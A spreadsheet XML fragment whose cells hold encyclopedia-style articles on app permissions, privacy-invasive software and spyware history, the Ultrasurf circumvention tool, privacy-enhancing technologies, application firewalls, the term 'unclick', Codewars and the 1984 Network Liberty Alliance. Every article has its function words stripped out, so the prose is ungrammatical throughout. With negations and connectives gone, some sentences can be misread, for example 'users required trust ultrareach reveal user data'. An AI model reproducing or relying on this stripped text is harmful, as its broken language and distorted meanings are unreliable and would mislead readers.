    <t>permissions means controlling regulating access specific system- device-level functions software. typically, types permissions cover functions privacy implications, ability access device's hardware features (including camera microphone), personal data (such device storage, contacts list, user's present geographical location). permissions typically declared application's manifest, certain permissions must specifically granted runtime user—who revoke permission time. permission systems common mobile operating systems, permissions needed specific apps must disclosed platform's store. mobile devices mobile operating systems smartphones tablets, typical types permissions regulate: access storage personal information, contacts, calendar appointments, etc. location tracking. access device's internal camera and/or microphone. access biometric sensors, including fingerprint readers health sensors.. internet access. access communications interfaces (including hardware identifiers signal strength applicable, requests enable them), bluetooth, wi-fi, near-field communication (nfc), others. making receiving phone calls. sending reading text messages ability perform in-app purchases. ability "overlay" within apps. installing, deleting otherwise managing applications. authentication tokens (i.e. oauth ones) services stored system storage sharing apps.prior android "marshmallow", permissions automatically granted apps runtime, presented upon installation google play store. since marshmallow, certain permissions require request permission runtime user. these permissions also revoked time android's settings menu. usage permissions android sometimes abused developers gather personal information deliver advertising; particular, apps using phone's camera flash flashlight (which grown largely redundant integration functionality system level later versions android) known require large array unnecessary permissions beyond actually needed stated functionality.ios imposes similar requirement permissions granted runtime, particular controls offered enabling bluetooth, wi-fi, location tracking. webpermissions webpermissions permission system browsers. when application needs data behind permission, must request first. when user sees window asking make choice. choice remembered, cleared lately. currently following resources controlled: geolocation desktop notifications service workers sensors audio capturing devices, like soundcards, model names characteristics video capturing devices, like cameras, identifiers characteristics analysis permission-based access control model assigns access privileges certain data objects application. this derivate discretionary access control model. access permissions usually granted context specific user specific device. permissions granted permanently automatic restrictions. cases permissions implemented 'all-or-nothing' approach: user either grant required permissions access application user access application. remains intransparent user permission used program application access data protected permission access control mechanism. even user revoke permission, blackmail user refusing operate, example crashing asking user grant permission order access application. permission mechanism widely criticized researchers several reasons, including; intransparency personal data extraction surveillance, including creation false sense security; end-user fatigue micro-managing access permissions leading fatalistic acceptance surveillance intransparency; massive data extraction personal surveillance carried permissions granted.there solutions, xprivacy, instead providing access requested data instead throwing exception crashing returning disinformation make operate permission granted. mockdroid another instance approach. also possible static analysis analyze requested permissions. further transparency methods include longitudinal behavioral profiling multiple-source privacy analysis data access. references</t>
  </si>
  <si>
    <t>Privacy-invasive software</t>
  </si>
  <si>
    <t>privacy-invasive software computer software ignores users privacy distributed specific intent, often commercial nature. three typical examples privacy invasive software adware, spyware browser hijacking programs. background digital setting, internet, wide variety privacy threats. these vary tracking user activity (sites visited, items purchased etc.), mass marketing based retrieval personal information (spam offers telemarketing calls common ever), distribution information lethal technologies used for, e.g., acts terror. spyware identity theft related topics whereby individuals could spyware change identity potential victim. spyware allows aggressor hacker extract victim's personal information behaviours, thus making easier steal identity victim.today, software-based privacy-invasions occur numerous aspects internet usage. spyware programs collect distribute user information secretly download execute users’ workstations. adware displays advertisements commercial content often based personal information retrieved spyware programs. system monitors record various actions computer systems. keyloggers record users’ keystrokes order monitor user behaviour. self-replicating malware downloads spreads disorder systems networks. data-harvesting software programmed gather e-mail addresses become conventional features internet, among things results spam e-mail messages filling networks computers unsolicited commercial content. with threats mind, privacy-invasive software defined definition privacy-invasive software category software ignores users’ right left alone distributed specific intent, often commercial nature, negatively affect[s] users. context, ignoring users’ right left alone means software unsolicited permit users determine when, extent personally identifiable data gathered, stored processed software. distributed means entered computer systems users (often unknown) servers placed internet infrastructure. often commercial nature means software (regardless type quality) used tool sort commercial plan gain revenues. problem spyware concept early 2000, steve gibson formulated first description spyware realizing software stole personal information installed computer. definition reads follows: spyware software employs user’s internet connection background (the so-called "backchannel") without knowledge explicit permission. this definition valid beginning spyware evolution. however, spyware concept evolved years attracted kinds behaviours. behaviours grew number diversity, term spyware became hollowed out. this evolution resulted great number synonyms sprang e.g. thiefware, scumware, trackware, badware. believed lack single standard definition spyware depends diversity different views really included, aaron weiss it:{{cquote|what old-school intruders going relatively straightforward define. spyware, broadest sense, harder down. despite vague comprehension essence spyware, descriptions include central aspects. degree associated user consent, level negative impact impair user computer system (further discussed section section (boldt 2007a)). because diffuse understanding spyware concept, recent attempts define forced compromises. anti-spyware coalition (asc) constituted public interest groups, trade associations, anti-spyware companies, come conclusion term spyware used different abstraction levels. level following definition, similar steve gibson's original one: narrow sense, spyware term tracking software deployed without adequate notice, consent, control user. however, since definition capture different types spyware available also provide wider definition, abstract appearance: difficulties defining spyware, forced define call spyware (and other potentially unwanted technologies) instead. this includes software users’ appropriate consent running computers. another group tried define spyware group called stopbadware.org, consists actors harvard school, oxford university, google, lenovo, microsystems. their result term spyware all, instead introduce term badware. their definition thereof span seven pages, essence looks follows: both definitions stopbadware.org show difficulty defining spyware. therefore regard term spyware different abstraction levels. lower level defined according steve gibsons original definition. however, broader abstract sense term spyware hard properly define, concluded above. introducing term "privacy-invasive software" joint conclusion important, software vendors users, clear separation acceptable unacceptable software behaviour established. reason subjective nature many spyware programs included, result inconsistencies different users beliefs, i.e. user regards legitimate software could regarded spyware others. spyware concept came include increasingly types programs, term hollowed out, resulting several synonyms, trackware, evilware badware, negatively emotive. therefore choose introduce term privacy-invasive software encapsulate software. believe term descriptive synonyms without negative connotation. even word invasive describe software, believe invasion privacy desired beneficial user long fully transparent, e.g. implementing specially user-tailored services including personalization features software. work warkentins (described section 7.3.1 (boldt 2007a)) used starting point developing classification privacy-invasive software, classify privacy-invasive software combination user consent direct negative consequences. user consent specified either low, medium high, degree direct negative consequences span tolerable, moderate, severe. this classification allows first make distinction legitimate software spyware, secondly spyware malicious software. software user consent, impairs severe direct negative consequences regarded malware. while, hand, software high user consent, results tolerable direct negative consequences regarded legitimate software. follows spyware constitutes remaining group software, i.e. medium user consent impair moderate direct negative consequences. this classification described detail chapter (boldt 2007a). addition direct negative consequences, also introduce indirect negative consequences. classification distinguishes negative behaviour program designed carry (direct negative consequences) security threats introduced software executing system (indirect negative consequences). example indirect negative consequence exploitation risk software vulnerabilities programs execute users’ systems without knowledge. comparison malware term privacy-invasive software motivated software types adware spyware essentially often defined according actions instead distribution mechanisms malware definitions, also rarely correspond motives e.g., business commerce). overall intention concept privacy-invasive software consequently convey commercial aspect unwanted software contamination. threats privacy-invasive software consequently find roots totalitarianism, malice political ideas, rather free market, advanced technology unbridled exchange electronic information. inclusion purpose definition, term privacy-invasive software contribution research community privacy security. history internet goes commercial mid-1990s, development internet increased rapidly interest general public. important factor behind accelerating increase 1993 release first browser, called mosaic. this marked birth graphically visible part internet known world wide (www) introduced 1990. commercial interests became well aware potential offered terms electronic commerce especially restrictions commercial internet removed opened space companies platform advertise sell goods. thus, shortly after, companies selling goods internet emerged, i.e. pioneers book dealer amazon.com retailer cdnow.com, founded 1994.during following years, personal computers broadband connections internet became commonplace. also, increased internet resulted e-commerce transactions involved considerable amounts money. competition customers intensified, e-commerce companies turned questionable methods battle entice customers completing transactions them. this opened ways illegitimate actors gain revenues stretching limits used methods collecting personal information propagating commercial advertisements. buying services allowed e-commerce companies advantage competitors, e.g. using advertisements based unsolicited commercial messages (also known spam) (jacobsson 2004). commercially motivated adverse software questionable techniques, spam, destructive traditional malicious techniques, e.g. computer viruses trojan horses. compared malicious techniques ones differed fundamental ways. first, necessarily illegal, secondly, main goal gaining money instead creating publicity creator reaping digital havoc. therefore, techniques grouped “grey” area next already existing “dark” side internet. behind development stood advertisers understood internet “merchant’s utopia”, offering huge potential global advertising coverage relatively cost. using internet global notice board, e-commerce companies could market products advertising agencies delivered online masses. 2004, online advertisement yearly represented $500 million billion markets, 2005 increased well billion-a-year. larger online advertising companies report annual revenues excess million each. beginning development companies distributed broadcast-like manner, i.e. streamlined towards individual users’ interests. some served directly sites banner ads, dedicated programs, called adware, soon emerged. adware used display pop-up windows without depending internet access pages. birth spyware search effective advertising strategies, companies soon discovered potential targeted towards user interests. once targeted online started appear, development took unfortunate turn. now, advertisers developed software became known spyware, collecting users’ personal interests, e.g. browsing habits. over coming years spyware would evolve significant threat internet-connected computers, bringing along reduced system performance security. information gathered spyware used constructing user profiles, including personal interests, detailing users could persuaded buy. introduction online advertisements also opened fund software development software display advertisements users. software developer could offer software “free charge”, since paid advertising agency. unfortunately, many users understand difference “free charge” “free gift”, difference free gift given without expectations future compensation, something provided free charge expects something return. dental examination provided free charge dentist school free gift. school expects gained training value consequence customer suffers increased risks. adware combined spyware, became problem computer users. when downloading software described “free charge” users reason suspect would report instance internet usage, presented advertisements could targeted towards interests. some users probably would accepted communicate browsing habits positive feedback, e.g. “offers” relevant interests. however, fundamental problem users properly informed neither occurrence extent monitoring, hence given chance decide whether participate not. advertisements became targeted, borders adware spyware started dissolve, combining programs single one, monitored users delivered targeted ads. fierce competition soon drove advertisers “enhance” ways used serving ads, e.g. replacing user-requested content sponsored messages instead, showing users. arms-race spyware vendors chase faster financial gains intensified, several competing advertisers turned even illegitimate methods attempt stay ahead competitors. this targeted advertising accelerated whole situation created “gray” conventional adds people chose see, subscribing internet site adds pushed users "pop-up adds" downloaded adds displayed program itself. this practice pushed internet advertising closer “dark” side spam types invasive, privacy compromising advertising. during development, users experienced infections unsolicited software crashed computers accident, change application settings, harvested personal information, deteriorated computer experience. over time problems introduction countermeasures form anti-spyware tools. these tools purported clean computers spyware, adware, type shady software located “gray” area. this type software lead false positives types legitimate software came branded users "spyware" (i.e. spybot: search destroy identifies scanspyware program spybot.) these tools designed similarly anti-malware tools, antivirus software. anti-spyware tools identify programs using signatures (semantics, program code, identifying attributes). process works known programs, lead false positives mentioned earlier leave previously unknown spyware undetected. aggravate situation, especially illegitimate companies distributed fake anti-spyware tools search larger piece online advertising market. these fake tools claimed remove spyware, instead installed share adware spyware unwitting users’ computers. sometimes even accompanied functionality remove adware spyware competing vendors. anti-spyware become area online vending fierce competition. spyware programs added setting seems never-ending stream, although increase levelled somewhat last years. however, still exist consensus common spyware definition classification, negatively affects accuracy anti-spyware tools. mentioned above, spyware programs remain undetected users' computers. developers anti-spyware programs officially state fight spyware complicated fight viruses, trojan horses, worms. predicted future development there several trends integrating computers software people's daily lives. example traditional media-oriented products integrated single device, called media centres. these media centres include functionality conventional television, dvd-players, stereo equipment, combined internet connected computer. foreseeable future media centres anticipated reach vast consumer impact. setting, spyware could monitor surveillance instance television channels watched, when/why users change channel movies users purchased watch. this information highly attractive advertising media-oriented corporation obtain. this presents probable scenario spyware tailored towards platforms; technology needed large extent used spyware today. another interesting area spyware vendors increasing amount mobile devices shipped. distributors advertisements already turned eyes devices. development utilized geographic position data stored devices. however, time writing companies working gps-guided coupons destined mobile phones hand-held devices. words, development location-based marketing allow advertising companies access personal geographical data serve geographically dependent coupons customers. once geographic data harvested correlated already accumulated personal information, another privacy barrier crossed. references citations general sources</t>
  </si>
  <si>
    <t>Ultrasurf</t>
  </si>
  <si>
    <t>ultrasurf freeware internet censorship circumvention product created ultrareach internet corporation. software bypasses internet censorship firewalls using http proxy server, employs encryption protocols privacy. software developed different groups falun gong practitioners time, starting 2002 expatriate chinese. software designed means allowing internet users bypass great firewall china. currently boasts many million users worldwide. tool described "one important free-speech tools internet" wired, "best performing" circumvention tool harvard university 2007 study; 2011 study freedom house ranked fourth. critics open-source community, george turner says, expressed concern software's closed-source nature alleged security obscurity design; ultrareach says security considerations mean prefer third party expert review open source review. overview 2001, ultrareach founded chinese dissidents silicon valley. shortly after, ultrasurf created allow internet users china evade government censorship monitoring. 2011 ultrasurf reported eleven million users worldwide. during arab spring, ultrareach recorded percent spike traffic tunisia. similar traffic spikes occur frequently times unrest regions, tibet burma saffron revolution. wired magazine 2010 called ultrasurf "one important free-speech tools internet" enabling citizens access share information oppressed countries times humanitarian human rights crises.ultrasurf funded, part, contracts u.s. government's broadcasting board governors, administers voice america radio free asia. 2012, ultrareach difficulty serving growing user base insufficient funding. operation client software ultrasurf free download requires installation. ultrasurf install files user's computer leaves registry edits exits. words, leaves trace use. fully remove software computer, user needs delete file named u.exe. available windows platform, runs internet explorer default, optional plug-in firefox chrome.the ultrareach website notes "some anti-virus software companies misclassify ultrasurf malware trojan ultrasurf encrypts communications circumvents internet censorship." some security companies agreed whitelist ultrasurf. according appelbaum, ultrasurf client uses anti-debugging techniques also employs executable compression. client acts local proxy communicates ultrareach network appears obfuscated form tls/ssl. ultrasurf servers software works creating encrypted http tunnel user's computer central pool proxy servers, enabling users bypass firewalls censorship. ultrareach hosts servers. software makes sophisticated, proprietary anti-blocking technology overcome filtering censorship online. according wired magazine, ultrasurf changes addresses proxy servers 10,000 times hour." server-side, 2011 analysis found ultrareach network employed squid ziproxy software, well bind servers bootstrapping wider network open recursive servers, latter ultrareach control.ultrasurf designed primarily anti-censorship tool also offers privacy protections form industry standard encryption, added layer obfuscation built ultrareach uses internal content filter blocks sites, deemed pornographic otherwise offensive. according wired magazine: "that's partly network lacks bandwidth accommodate much data-heavy traffic, also falun gong frowns erotica." additionally, falun gong criticism website facts.org.cn, alleged operated chinese government, also unreachable ultrasurf. evaluation 2007 study, harvard university's berkman center internet society found ultrasurf "best performing" tested circumvention tools in-country tests, recommended widespread use. particular, report found ultrasurf effectively bypassed various forms censorship blocking, include block, block, keyword filtering. also fastest tool in-country tests, noted easy install simple user interface. report noted, however, ultrareach designed primarily circumvention product, rather anonymity tool, suggested users concerned anonymity disable browser support active content using ultrasurf.a 2011 report u.s.-based human rights group freedom house ranked ultrasurf fourth overall among censorship circumvention privacy tools, measured combination performance, usability, support security. particular, tool recommended users interested downloading viewing information, required relatively high degree privacy, favored fast connection speed.some technologists expressed reservations ultrareach model, however. particular, developers criticized proponents open-source software allowing peer review tool's design, except discretion creators. moreover, ultrareach operates servers, developers access user logs. this architecture means users required trust ultrareach reveal user data. ultrareach maintains keeps logs short period time, uses purpose analyzing traffic signs interference monitor overall performance efficacy; company says disclose user logs third parties. according jacob appelbaum project, essentially amounts example "privacy policy".in april 2012 report, appelbaum criticized ultrasurf internal content filtering (including blocking pornographic websites), willingness comply subpoenas u.s. enforcement officials. appelbaum's report also noted ultrasurf pages employed google analytics, potential leak user data, systems date latest security patches make forward security mechanisms. furthermore, appelbaum claims "the ultrasurf client uses open free software including putty zlib. putty zlib disclosed. this lack disclosure violation licenses." response posted day, ultrareach wrote already resolved issues. they asserted appelbaum's report misrepresented misunderstood aspects software. ultrareach also argued differences software approaches internet censorship represented ultrasurf base philosophical simply different approaches censorship circumvention. top-secret presentation revealed part 2013 global surveillance disclosures dismisses response ultrasurf "all talk show".due restrictions imposed organizations, mcafee virusscan flagging ultrasurf versions potentially unwanted program, avoiding execution machines. also internet censorship internet censorship circumvention internet censorship people's republic china bypassing content-control filters bypassing great firewall china freegate references external links official website bypass internet censorship, floss manual, march 2011,</t>
  </si>
  <si>
    <t>Privacy-enhancing technologies</t>
  </si>
  <si>
    <t>privacy-enhancing technologies (pet) technologies embody fundamental data protection principles minimizing personal data use, maximizing data security, empowering individuals. pets allow online users protect privacy personally identifiable information (pii) provided handled services applications. pets techniques minimize possession personal data without losing functionality information system. generally speaking, pets categorized hard soft privacy technologies. goals pets objective pets protect personal data ensure users technology information confidential management data protection priority organizations withhold responsibility allowing users take following actions related personal data sent used online service providers, merchants users. goal privacy-enhancing technologies include increasing control personal data sent used online service providers merchants online users)(self-determination). pets minimize personal data collected used service providers merchants, pseudonyms anonymous data credentials provide anonymity, strive achieve informed consent giving personal data online service providers merchants. privacy negotiations, consumers service providers establish, maintain, refine privacy policies individualized agreements ongoing choice among service alternatives, therefore providing possibility negotiate terms conditions giving personal data online service providers merchants (data handling/privacy policy negotiation). within private negotiations, transaction partners additionally bundle personal information collection processing schemes monetary non-monetary rewards.pets provide possibility remotely audit enforcement terms conditions online service providers merchants (assurance), allow users log, archive look past transfers personal data, including data transferred, when, conditions, facilitate legal rights data inspection, correction deletion. pets also provide opportunity consumers people want privacy-protection hide personal identities. process involves masking one's personal information replace information pseudo data anonymous identity. families pets privacy-enhancing technologies distinguished based assumption. soft privacy technologies where assumed third-party trusted processing data. this model based compliance, consent, control audit.example technologies access control, differential privacy, tunnel encryption (ssl/tls). hard privacy technologies single entity violate privacy user. assumes third-parties cannot trusted. data protection goal data minimization reduction trust third-parties.examples technologies include onion routing, secret ballot, vpns used democratic elections. existing pets pets evolved since first appearance 1980s. intervals, review articles published state privacy technology: principal, though fundamentally theoretical overview terminology principal anonymization technology found pfitzmann hansen's terminology anonymity. 1997, report goldberg, wagner brewer university california berkeley summarized pets. 2003, borking, blarkom reviewed technologies data protection perspective handbook privacy enhancing technologies. 2007, fritsch published historic, taxonomic practical overview contemporary privacy-enhancing technology internet research project petweb. 2008, fritsch abie documented implemented pets successful deployment research roadmap pets. 2015, heurix published taxonomy privacy enhancing technologies. specialization research looks increasing transparency data processing researches transparency enhancing technologies (tets). review article janic summarizes developments. murmann fischer-hübner published 2017 review transparency tools. 2019, world economic forum published white paper exploring cases financial technology infrastructure. boston women's workforce council published reports 2017 2019 exploring gender number boston-based companies. data compared using pets, ensure sensitive employee information remained private throughout. 2020, identiq published ebook discussing pets actively used identity validation. 2021, european data protection board, oversees enforcement gdpr, european union agency cybersecurity published technical guidance supporting secure multi-party computation valid privacy-preserving safeguard, applying healthcare cybersecurity cases. example pets examples existing privacy enhancing technologies are: communication anonymizers hiding real online identity (email address, address, etc.) replacing non-traceable identity (disposable one-time email address, random address hosts participating anonymising network, pseudonym, etc.). they applied email, browsing, networking, voip, chat, instant messaging, etc. shared bogus online accounts. person creates account msn, providing bogus data name, address, phone number, preferences, life situation etc. they publish user-ids passwords internet. everybody account comfortably. thereby user sure personal data account profile. (moreover, freed hassle register site himself.) obfuscation refers many practices adding distracting misleading data profile, especially useful frustrating precision analytics data already lost disclosed. effectiveness humans questioned, greater promise shallow algorithms. obfuscating also hides personal information sensitive data computer algorithms masking techniques. this technique also involve adding misleading distracting data information harder attacker obtain needed data. access personal data: service provider's infrastructure allows users inspect, correct delete data stored service provider. enhanced privacy (epid) digital signature algorithm supporting anonymity. unlike traditional digital signature algorithms (e.g., pki), entity unique public verification unique private signature key, epid provides common group public verification associated many unique private signature keys. epid created device could prove external party kind device (and optionally software running device) without needing also reveal exact identity, i.e., prove authentic member group without revealing member. since 2008. homomorphic encryption form encryption allows computation ciphertexts. zero-knowledge proof method party (the prover) prove another party (the verifier) know value without conveying information apart fact know value secure multi-party computation method parties jointly compute function inputs keeping inputs private. ring signature type digital signature performed member users pair cryptographic keys. non-interactive zero-knowledge proof (nizks) zero-knowledge proofs require interaction prover verifier. format-preserving encryption (fpe), refers encrypting output (the ciphertext) format input (the plaintext) blinding cryptography technique agent provide service client encoded form without knowing either real input real output. differential privacy: algorithm constrained results outputs data analysis can't tell certain individuals information used analyze form results. this technique focuses large databases hides identity individual "inputs" might private data privacy concerns, pseudonymization data management technique replaces individual's identity personal information artificial identifiers known pseudonyms. this de-identification method enables contents fields information covered deter attacks hackers obtaining important information. these pseudonyms either placed groups individual pieces information. overall, serve discourage information stealing also maintaining data integrity data analysis. federated learning machine learning technique trains models across multiple distributed nodes. each node houses local, private dataset. future pets examples privacy enhancing technologies researched developed include limited disclosure technology, anonymous credentials online rental, negotiation enforcement data handling conditions, data transaction log. limited disclosure technology provides protecting individuals' privacy allowing share enough personal information service providers complete interaction transaction. this technology also designed limit tracking correlation users’ interactions third parties. limited disclosure uses cryptographic techniques allows users retrieve data vetted provider, transmit data relying party, relying parties trust authenticity integrity data. anonymous credentials asserted properties rights credential holder reveal true identity holder; information revealed holder credential willing disclose. assertion issued user himself/herself, provider online service third party (another service provider, government agency, etc.). example: online rental. rental agency need know true identity customer. needs make sure customer example), customer drivers license, health insurance (i.e. accidents, etc.), customer paying. thus real need know customers name address personal information. anonymous credentials allow parties comfortable: allow customer reveal much data rental agency needs providing service (data minimization), allow rental agency verify requirements money. when ordering online, user, instead providing classical name, address credit card number, provides following credentials, issued pseudonyms (i.e. real name customer): assertion minimal age, issued state, proving holder older (note: actual provided) driving licence, i.e. assertion, issued motor vehicle control agency, holder entitled drive cars proof insurance, issued health insurance digital cashnegotiation enforcement data handling conditions. before ordering product service online, user online service provider merchant negotiate type personal data transferred service provider. this includes conditions shall apply handling personal data, whether sent third parties (profile selling) conditions (e.g. informing user), time future shall deleted all). after transfer personal data took place, agreed upon data handling conditions technically enforced infrastructure service provider, capable managing processing data handling obligations. moreover, enforcement remotely audited user, example verifying chains certification based trusted computing modules verifying privacy seals/labels issued third party auditing organizations (e.g. data protection agencies). thus instead user rely mere promises service providers abuse personal data, users confident service provider adhering negotiated data handling conditions lastly, data transaction allows users ability personal data send service provider(s), time conditions. these logs stored allow users determine data sent whom, establish type data possession specific service provider. this leads transparency, pre-requisite control. also crypto-shredding cypherpunk digital credentials digital self-determination enhanced privacy (epid) identity management information privacy information processing information security privacy privacy design privacy engineering privacy-enhanced electronic mail privacy software privacy policy self-sovereign identity references blarkom, g.w.; borking, j.j.; olk, j.g.e. (2003). "pet". handbook privacy privacy-enhancing technologies. (the case intelligent software agents). isbn 978-90-74087-33-9. cánovas sanchez, jose luis; bernal bernabe, jorge; skarmeta, antonio (2018). "integration anonymous credential systems constrained environments". ieee access. 4767–4778. doi:10.1109/access.2017.2788464. notes external links pets general: prime research project (2004 2008) aiming studying developing novel pets about pets center democracy technology annual symposium pets report pets meta group, published danish ministry science activities commission area pets broken linkanonymous credentials: zürich research lab's idemix stefan brands' u-prove digital credential 'credentica' owned microsoft u-proveprivacy policy negotiation: w3c's ibm's epal sören preibusch: implementing privacy negotiations e-commerce, discussion papers berlin 526, 2005</t>
  </si>
  <si>
    <t>Privacy software</t>
  </si>
  <si>
    <t>privacy software software built protect privacy users. software typically works conjunction internet usage control limit amount information made available third parties. software apply encryption filtering various kinds. types protection privacy software refer different types protection. first type protecting user's internet privacy world wide web. there software products mask hide user's address outside world protect user identity theft. second type protection hiding deleting user's internet traces left surfing internet. there software erase user's internet traces software hide encrypt user's traces others using know surfing. whitelisting blacklisting solution enhance privacy software whitelisting. whitelisting process company identifies software allow recognize malware. whitelisting permits acceptable software either prevents anything else running lets software quarantined environment validity verified. whereas whitelisting allows nothing unless whitelist, blacklisting allows everything unless black. blacklist includes certain types software allowed company environment. example, company might blacklist peer-to-peer file sharing systems. addition software, people, devices, websites also whitelisted blacklisted. intrusion detection systems intrusion detection systems designed detect types malicious network traffic computer usage cannot detected firewall. these systems capture network traffic flows examine contents packet malicious traffic. encryption encryption another form privacy security. when organizations secure channel sending information, encryption stop unauthorized eavesdroppers. encryption process converting original message form cannot read anyone except intended receiver. steganography steganography sometimes used hide messages eavesdropping e-surveillance. compared using cryptography, translates text another format, stenography hides data rather converting according company privacy canada, using steganography, ensure messages hidden exposed. similar cryptography, message encoded protection various ways: text, image, audio, video, network steganography. substitute cryptography conceal texts viewed. privacy anonymity privacy different anonymity applicability usage. anonymity subordinate privacy might desired exchange, retrieval, publication specific information. also general topics information privacy internet privacy encryption privacy proxy server metadata removal tool privacy engineering privacy-enhancing technologies software privacy guard (gpg) pretty easy privacy portable firefox pretty good privacy (pgp) secure shell (ssh) uproxy references external links prism break 27701 nist</t>
  </si>
  <si>
    <t>Application firewall</t>
  </si>
  <si>
    <t>application firewall form firewall controls input/output system calls application service. operates monitoring blocking communications based configured policy, generally predefined rule sets choose from. application firewall control communications application layer model, highest operating layer, gets name. primary categories application firewalls network-based host-based. history gene spafford purdue university, bill cheswick at&amp;t laboratories, marcus ranum described third-generation firewall known application layer firewall. marcus ranum's work, based firewall created paul vixie, brian reid, jeff mogul, spearheaded creation first commercial product. product released dec, named seal geoff mulligan secure external access link. dec's first major sale june 1991, dupont. under broader darpa contract tis, marcus ranum, peter churchyard developed firewall toolkit (fwtk) made freely available license october 1993. purposes releasing freely available, commercial use, fwtk were: demonstrate, software, documentation, methods used, company time) years experience formal security methods, individuals firewall experience, developed firewall software; create common base good firewall software others build people continue "roll own" scratch); "raise bar" firewall software used. however, fwtk basic application proxy requiring user interactions. 1994, extended fwtk kernel enhancement stateful filter socket transparent. this first transparent firewall, known inception third generation firewall, beyond traditional application proxy (the second generation firewall), released commercial product known gauntlet firewall. gauntlet firewall rated application firewalls 1995 1998, year acquired network associates inc, (nai). network associates continued claim gauntlet "worlds secure firewall" 2000, security researcher stickley discovered large vulnerability firewall, allowing remote access operating system bypassing security controls. stickley discovered second vulnerability year later, effectively ending gauntlet firewalls' security dominance. description application layer filtering operates higher level traditional security appliances. this allows packet decisions made based source/destination address ports also information spanning across multiple connections given host. network-based application firewalls network-based application firewalls operate application layer tcp/ip stack understand certain applications protocols file transfer protocol (ftp), domain name system (dns), hypertext transfer protocol (http). this allows identify unwanted applications services using standard port detect allowed protocol abused.modern versions network-based application firewalls include following technologies: encryption offloading intrusion prevention system data loss preventionweb application firewalls (waf) specialized version network-based appliance acts reverse proxy, inspecting traffic forwarded associated server. host-based application firewalls host-based application firewall monitors application system calls general system communication. this gives granularity control, limited protecting host running control applied filtering process basis. generally, prompts used define rules processes received connection. further filtering done examining process owner data packets. many host-based application firewalls combined used conjunction packet filter.due technological limitations, modern solutions sandboxing used replacement host-based application firewalls protect system processes. implementations there various application firewalls available, including free open source software commercial products. starting leopard, implementation trustedbsd framework (taken freebsd), included. trustedbsd framework used sandbox services provides firewall layer given configuration sharing services leopard snow leopard. third-party applications provide extended functionality, including filtering outgoing connections app. linux this list security software packages linux, allowing filtering application communication, possibly by-user basis: apparmor kerio control commercial product modsecurity also works windows, solaris versions unix. modsecurity designed work web-servers iis, apache2 nginx. portmaster safing activity monitoring application. also available windows. systrace zorp windows wingate network appliances these devices sold hardware, software, virtualized network appliances. next-generation firewalls: cisco firepower threat defense check point fortinet fortigate series juniper networks series palo alto networks sonicwall tz/nsa/supermassive seriesweb application firewalls/loadbalancers: networks application firewall barracuda networks application firewall/load balancer citrix netscaler networks big-ip application security manager fortinet fortiweb series kemp technologies impervaothers: cloudflare meraki smoothwall snapt also references external links application firewall, open application security project application firewall evaluation criteria, application security consortium safety cloud(s): 'vaporizing' application firewall secure cloud computing</t>
  </si>
  <si>
    <t>Unclick</t>
  </si>
  <si>
    <t>unclick term, increasingly applied context computing, computer user un-chooses de-selects specific preference, typically moving cursor selection, pressing left mouse button. result, check mark image dark circle inside checkbox radio button removed. while january 2012 term unclick generally formally defined dictionaries, term used popular parlance countries united states, britain, canada. background internet becomes increasingly popular medium marketers, vendors marketers often presume user prefer certain choices, receiving emails future, specific computer settings, preferring specific programs operational computer turned result, sometimes necessary user unclick choices avoid exposure unwanted advertising, avoid situation different website chosen one's home page. internet marketing, unclicking often required user avoid billed automatically unnecessary services, sometimes part deceptive business practice termed negative option billing. user's facebook privacy settings often chosen advance facebook inc., presumes user would like particular settings, un-choose options, user need unclick opt-out facebook-determined choices finding right menus. according behavioral economics, computer internet users general tendency along default setting. other contexts term unclick also used contexts, latching locking mechanism, lock briefcase, seat belts airplane, door lock, mechanisms typically make "clicking" sound. contexts, unclicking means open latch seat belt. also used context guns, safety catch "unclicked", flooring materials pieces interlocked, term used describe answering cell phone pressing button ringing. references</t>
  </si>
  <si>
    <t>Codewars</t>
  </si>
  <si>
    <t>codewars educational community computer programming. platform, software developers train programming challenges known kata. these discrete programming exercises train range skills variety programming languages, completed within online integrated development environment. codewars community challenge progression gamified, users earning ranks honor completing kata, contributing kata, quality solutions.the platform owned operated qualified, technology company provides platform assessing training software engineering skills. history founded nathan doctor jake hoffner november 2012, project initially began startup weekend competition year, prototyped. awarded first place competition, drawing attention engineers, funding interest judges paige craig (angel investor) brian (entrepreneur).after building first production iteration platform, launched hacker news community, receiving significant attention challenge format signing approximately 10,000 users within weekend. also codefights codingame competitive programming hackerrank external links official website angellist profile references</t>
  </si>
  <si>
    <t>1984 Network Liberty Alliance</t>
  </si>
  <si>
    <t>1984 network liberty alliance loose group software programmers, artists, social activists militants, interested computers networks considering tools empower link various actors social movement around world. they part hacktivism movement. history group formed november 1984, "debriefing" workshop european peace marches hartmannswillerkopf alsace, france, following struggle installation pershing ss-20 nuclear missiles germany (mutlangen). from 1978 1985, european-wide peace movement mobilized millions citizens, protesting arms race, growth military spending joining campaign nuclear disarmament. reference george orwell's novel 1984 rebel alliance movie star wars, group chose (ironic) name 1984 network liberty alliance. founders andré gorz, french philosopher, lerner, computer graduate disciple saul alinsky, well gregoire seither, free radio activist, frauke hahn woman's resistance ('commons women') greenham common women's peace camp, david szwarc israeli peace movement adama drasiweni, computer graduate university london, future founder n'da, africa's first independent telecom company. other members, like australian co-founder indymedia matthew arnison, south-african anti-apartheid militant peter makema israeli peace activists avnery michel warchawsky, joined later active various social movements peace initiatives europe usa. when richard stallman published manifesto march 1985 called participation support, lerner gregor seither started organizing regular meetings workshops order train activists information technology gather support free software movement. adama drasiweni, owner computer business london, similar workshops kibera, giant slum outside nairobi, kenya. france, alliance used network maisons l'informatique presidency françois mitterrand well computer labs paris university, access academic networks billboard systems. group number bbs, among 'pom-pom', devoted apple macintosh 'peacenet', "electronic pow-wow" help social activists community organizers exchange information around world, offering free mail accounts file hosting services. very soon issues free speech, software patents, civil rights surveillance became major topics addressed alliance, group accused hacking forking software. group 'gaia rising', accused german government meeting point radical environmental activists well anarchists. liberty alliance particularly active popular worldwide resistance multilateral agreement investments (mai) mid-1990s, networking multiple groups providing "open cyberspaces" activists share information experience. summer 1998 first alternative media centre birmingham, united kingdom global street party, international protest festive actions coinciding 24th summit. alternative media centres also provided interpretation language services international militant meetings, like july 1999 global carnival capitalism, london, giant rally party heart london city, meant counter-summit 25th summit köln, germany. members team travelled ministerial conference 1999 seattle alternative media centre ministerial conference 1999 protest activity. project joined media activists and, necessity bypass corporate media report conference also show could bypass corporate software (windows), independent media agency indymedia born. language diversity lack interpreters number activists start thinking help militants around world bridge language barrier. three years later, 27th summit genoa, italy, would lead creation babels network volunteer interpreters translators linguistic diversity social change. members network liberty alliance worked social projects north america (san francisco free software movement, chicago community cybercenter), central america (nicaragua, guatemala, panama), middle-east (egypt, israeli civil administration area) 